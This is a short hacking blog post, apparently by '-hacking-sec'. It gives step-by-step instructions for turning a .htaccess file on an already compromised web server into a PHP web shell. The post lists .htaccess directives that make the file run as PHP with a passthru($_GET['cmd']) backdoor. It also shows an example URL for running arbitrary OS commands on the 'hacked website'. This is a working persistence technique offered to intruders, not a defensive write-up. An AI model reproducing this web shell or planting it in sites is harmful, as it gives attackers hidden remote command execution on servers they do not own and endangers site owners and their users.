Today I will be telling you all a less know trick in which your can use .htaccess file on your already backdoored server as a shell to execute OS commands, so just follow the simple steps described below.
Open your PHP web shell, navigate to public_html directory and search for .htaccess file, once found, click on edit option.
After clicking on the edit option, add the following lines of code in yout .htaccess file.
<Files ~ "^\.ht"> Order allow,deny Allow from all </Files> AddType application/x-httpd-php .htaccess # <?php passthru($_GET['cmd']); ?>
After adding your codes, save it, and you are done ! :D
Now in order to use your .htaccess shell
http://www.your-hacked-website.com/.htaccess?cmd=ls
After ?cmd= you can execute any OS command of your choice.
by -hacking-sec
0 comments:
Post a Comment